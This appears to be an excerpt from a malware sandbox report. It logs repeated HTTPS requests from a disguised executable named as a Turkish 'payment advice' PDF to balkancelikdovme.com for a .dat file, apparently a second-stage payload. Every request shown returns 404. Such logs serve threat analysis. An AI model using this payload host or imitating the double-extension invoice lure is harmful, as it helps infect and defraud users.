      2024-12-16 13:19:41 UTC708INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      63192.168.2.750012185.181.116.2174437264C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exe
      TimestampBytes transferredDirectionData
      2024-12-16 13:19:42 UTC64OUTGET /eyiiam/Qtmwlbz.dat HTTP/1.1
      Host: balkancelikdovme.com
      2024-12-16 13:19:43 UTC236INHTTP/1.1 404 Not Found
      Connection: close
      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
      pragma: no-cache
      content-type: text/html
      content-length: 708
      date: Mon, 16 Dec 2024 13:19:43 GMT
      vary: User-Agent
      2024-12-16 13:19:43 UTC708INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      64192.168.2.750017185.181.116.2174437264C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exe
      TimestampBytes transferredDirectionData
      2024-12-16 13:19:44 UTC64OUTGET /eyiiam/Qtmwlbz.dat HTTP/1.1
      Host: balkancelikdovme.com
      2024-12-16 13:19:45 UTC236INHTTP/1.1 404 Not Found
      Connection: close
      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
      pragma: no-cache
      content-type: text/html
      content-length: 708
      date: Mon, 16 Dec 2024 13:19:44 GMT
      vary: User-Agent
      2024-12-16 13:19:45 UTC708INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      65192.168.2.750022185.181.116.2174437264C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exe
      TimestampBytes transferredDirectionData
      2024-12-16 13:19:46 UTC64OUTGET /eyiiam/Qtmwlbz.dat HTTP/1.1
      Host: balkancelikdovme.com
      2024-12-16 13:19:46 UTC236INHTTP/1.1 404 Not Found
      Connection: close
      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
      pragma: no-cache
      content-type: text/html
      content-length: 708
      date: Mon, 16 Dec 2024 13:19:46 GMT
      vary: User-Agent
      2024-12-16 13:19:46 UTC708INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      66192.168.2.750027185.181.116.2174437264C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exe
      TimestampBytes transferredDirectionData
      2024-12-16 13:19:48 UTC64OUTGET /eyiiam/Qtmwlbz.dat HTTP/1.1
      Host: balkancelikdovme.com
      2024-12-16 13:19:48 UTC236INHTTP/1.1 404 Not Found
      Connection: close
      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
      pragma: no-cache
      content-type: text/html
      content-length: 708
      date: Mon, 16 Dec 2024 13:19:48 GMT
      vary: User-Agent
      2024-12-16 13:19:48 UTC708INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      67192.168.2.750032185.181.116.2174437264C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exe
      TimestampBytes transferredDirectionData
      2024-12-16 13:19:50 UTC64OUTGET /eyiiam/Qtmwlbz.dat HTTP/1.1
      Host: balkancelikdovme.com
      2024-12-16 13:19:50 UTC236INHTTP/1.1 404 Not Found
      Connection: close
      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
      pragma: no-cache
      content-type: text/html
      content-length: 708
      date: Mon, 16 Dec 2024 13:19:50 GMT
      vary: User-Agent
      2024-12-16 13:19:50 UTC708INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      68192.168.2.750038185.181.116.2174437264C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exe
      TimestampBytes transferredDirectionData
      2024-12-16 13:19:52 UTC64OUTGET /eyiiam/Qtmwlbz.dat HTTP/1.1
      Host: balkancelikdovme.com
      2024-12-16 13:19:52 UTC236INHTTP/1.1 404 Not Found
      Connection: close
      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
      pragma: no-cache
      content-type: text/html
      content-length: 708
      date: Mon, 16 Dec 2024 13:19:52 GMT
      vary: User-Agent
      2024-12-16 13:19:52 UTC708INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      69192.168.2.750039185.181.116.2174437264C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exe
      TimestampBytes transferredDirectionData
      2024-12-16 13:19:53 UTC64OUTGET /eyiiam/Qtmwlbz.dat HTTP/1.1
      Host: balkancelikdovme.com
      2024-12-16 13:19:54 UTC236INHTTP/1.1 404 Not Found
      Connection: close
      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
      pragma: no-cache
      content-type: text/html
      content-length: 708
      date: Mon, 16 Dec 2024 13:19:54 GMT
      vary: User-Agent
      2024-12-16 13:19:54 UTC708INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      70192.168.2.750040185.181.116.2174437264C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exe
      TimestampBytes transferredDirectionData
      2024-12-16 13:19:55 UTC64OUTGET /eyiiam/Qtmwlbz.dat HTTP/1.1
      Host: balkancelikdovme.com
      2024-12-16 13:19:56 UTC236INHTTP/1.1 404 Not Found
      Connection: close
      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
      pragma: no-cache
      content-type: text/html
      content-length: 708
      date: Mon, 16 Dec 2024 13:19:56 GMT
      vary: User-Agent
      2024-12-16 13:19:56 UTC708INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      71192.168.2.750041185.181.116.2174437264C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exe
      TimestampBytes transferredDirectionData
      2024-12-16 13:19:57 UTC64OUTGET /eyiiam/Qtmwlbz.dat HTTP/1.1
      Host: balkancelikdovme.com
      2024-12-16 13:19:58 UTC236INHTTP/1.1 404 Not Found
      Connection: close
      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
      pragma: no-cache
      content-type: text/html
      content-length: 708
      date: Mon, 16 Dec 2024 13:19:57 GMT
      vary: User-Agent
      2024-12-16 13:19:58 UTC708INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      72192.168.2.750042185.181.116.2174437264C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exe
      TimestampBytes transferredDirectionData
      2024-12-16 13:19:59 UTC64OUTGET /eyiiam/Qtmwlbz.dat HTTP/1.1
      Host: balkancelikdovme.com
      2024-12-16 13:19:59 UTC236INHTTP/1.1 404 Not Found
      Connection: close
      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
      pragma: no-cache
      content-type: text/html
      content-length: 708
      date: Mon, 16 Dec 2024 13:19:59 GMT
      vary: User-Agent
      2024-12-16 13:19:59 UTC708INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      73192.168.2.750043185.181.116.2174437264C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exe
      TimestampBytes transferredDirectionData
      2024-12-16 13:20:01 UTC64OUTGET /eyiiam/Qtmwlbz.dat HTTP/1.1
      Host: balkancelikdovme.com
      2024-12-16 13:20:01 UTC236INHTTP/1.1 404 Not Found
      Connection: close
      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
      pragma: no-cache
      content-type: text/html
      content-length: 708
      date: Mon, 16 Dec 2024 13:20:01 GMT
      vary: User-Agent
      2024-12-16 13:20:01 UTC708INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      74192.168.2.750044185.181.116.2174437264C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exe
      TimestampBytes transferredDirectionData
      2024-12-16 13:20:03 UTC64OUTGET /eyiiam/Qtmwlbz.dat HTTP/1.1
      Host: balkancelikdovme.com
      2024-12-16 13:20:03 UTC236INHTTP/1.1 404 Not Found
      Connection: close
      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
      pragma: no-cache
      content-type: text/html
      content-length: 708
      date: Mon, 16 Dec 2024 13:20:03 GMT
      vary: User-Agent
      2024-12-16 13:20:03 UTC708INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      75192.168.2.750045185.181.116.2174437264C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exe
      TimestampBytes transferredDirectionData
      2024-12-16 13:20:05 UTC64OUTGET /eyiiam/Qtmwlbz.dat HTTP/1.1
      Host: balkancelikdovme.com
      2024-12-16 13:20:05 UTC236INHTTP/1.1 404 Not Found
      Connection: close
      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
      pragma: no-cache
      content-type: text/html
      content-length: 708
      date: Mon, 16 Dec 2024 13:20:05 GMT
      vary: User-Agent
      2024-12-16 13:20:05 UTC708INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      76192.168.2.750046185.181.116.2174437264C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exe
      TimestampBytes transferredDirectionData
      2024-12-16 13:20:06 UTC64OUTGET /eyiiam/Qtmwlbz.dat HTTP/1.1
      Host: balkancelikdovme.com
      2024-12-16 13:20:07 UTC236INHTTP/1.1 404 Not Found
      Connection: close
      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
      pragma: no-cache
      content-type: text/html
      content-length: 708
      date: Mon, 16 Dec 2024 13:20:07 GMT
      vary: User-Agent
